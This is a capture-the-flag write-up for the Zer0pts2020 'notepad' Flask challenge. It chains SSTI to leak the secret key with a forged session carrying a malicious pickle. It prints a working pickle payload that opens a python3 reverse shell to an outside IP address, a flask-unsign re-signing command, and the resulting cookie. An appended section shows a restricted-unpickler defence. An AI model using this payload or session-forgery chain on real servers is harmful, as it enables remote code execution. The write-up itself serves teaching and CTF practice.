web | [Zer0pts2020]notepad
Reference: guoke's writeup: https://guokeya.github.io/post/3kK-0Vkzq/
The core of the challenge is SSTI plus pickle deserialization.
First, leak Flask's secret key through the SSTI.
Then forge the session token (the "JWT") so that the server deserializes attacker-controlled pickle data.
Generate the pickle. Here I use python3 for the reverse shell, since a Flask host certainly has that available, which is convenient:
Note that the pickle output differs between Windows and Linux: os.system serializes as posix.system on Linux but as nt.system on Windows, so the same script produces different streams.
```python
import pickle
import base64
import os


class Person(object):
    # The callable and arguments returned here are executed when the stream is unpickled
    def __reduce__(self):
        return (os.system, ("python3 -c \"import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('43.142.193.63',9996));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);\"",))


admin = Person()
# base64-encode the pickle bytes so they fit into the session's savedata field
print(base64.b64encode(pickle.dumps(admin)))
```
Then re-sign the session with the flask-unsign tool:
```shell
flask-unsign -s -S "b'\x84\x8f\xce\xe0+\xa0\xda\xfd*\x81\xa8ctY\x91\xb7'" -c "{'savedata':b'gASVAQEAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjOZweXRob24zIC1jICJpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgnNDMuMTQyLjE5My42MycsOTk5NikpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpOyBvcy5kdXAyKHMuZmlsZW5vKCksMik7cD1zdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk7IpSFlFKULg=='}"
```
The result is:
```
.eJwlkMuOmzAARX-l4gtsXKrOLFMegY6dYPzA7OwYiWBDycAkhNH8e6m6uIu7uEdH9zOY9b21etHB62fwzQSvQQNSJlxKKU8P5f_EjBeqHJseDw9gEo9oiDdznByFzd6ns5DTWY7Wy7S4qz4HrfMxllNRgumhfPfLDuSDS9vj3t8UKyRO1pz1aWNcEam-OJkMb6wmVwwAUujP2g75k42FlmkK1ZZHekieoj-8VUkUSlYAk9GY8KIysf8tskUKvvPGpsEjnZsEQ5GWD-ZWhXkkhFxk6SnTm-1bJm67H7RiqtnOK0P7wRwllkPOa4-145DVDmAHI4XIWWQzZIN_vyQ_n6d6wkbkqwK0MCGJiISdQN2sBvDdgIVZZN_EkYyqJ2Tn52K0RMvuB8ugvmTFUYzi2kr7YAlNL8lL9O_P3ee9SbtDy5ec1UIbuW7SX6B1S6wR2fczUqDc_6B1NdreMH-Tvju1bl3Y0F0psneBfG-9X8xRYAyiezV6ZNxa6zBSPJxRVR8YHdasggI3G3gJvr7-AlOpqeE.ZJ08-Q.2eFPuQHyrqF18zaObRGgsw0eBSA
```
Send that cookie and the reverse shell comes back (guoke, my hero!).
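As an added defensive counterpart, not part of the original writeup: the server-side fix for what is exploited above is to never resolve arbitrary globals while unpickling the savedata field, so a stream that reduces to os.system (posix.system on Linux) is rejected before anything runs. The RestrictedUnpickler, the allow-list, and the load_savedata/is_safe_savedata names are hypothetical example code, and both sample streams are constructed here (the probe reduces to the harmless os.getpid instead of the shell payload).

```python
import base64
import io
import os
import pickle

# Hypothetical allow-list: the only globals a savedata stream may reference.
# Plain dicts, lists, strings and numbers need no global at all.
SAFE_GLOBALS = {
    ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse every GLOBAL/STACK_GLOBAL lookup that is not allow-listed."""

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        # Raised before the callable is resolved, so __reduce__ payloads never run
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")


def load_savedata(b64_blob: bytes):
    """Decode the base64 cookie field and unpickle it under the restriction."""
    raw = base64.b64decode(b64_blob)
    return RestrictedUnpickler(io.BytesIO(raw)).load()


def is_safe_savedata(b64_blob: bytes) -> bool:
    """True if the blob unpickles without touching a blocked global."""
    try:
        load_savedata(b64_blob)
        return True
    except pickle.UnpicklingError:
        return False


class _Probe:
    # Constructed stand-in for the exploit: reduces to a harmless os function
    def __reduce__(self):
        return (os.getpid, ())


# Constructed samples: a benign note and the probe stream
BENIGN = base64.b64encode(pickle.dumps({"note": "hello", "tags": ["a", "b"]}))
PROBE = base64.b64encode(pickle.dumps(_Probe()))

if __name__ == "__main__":
    print("benign:", is_safe_savedata(BENIGN), "probe:", is_safe_savedata(PROBE))
```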
Tags: web, socket, flask, os, notepad, Zer0pts2020, import, pickle
From: https://www.cnblogs.com/Mz1-rc/p/17514513.html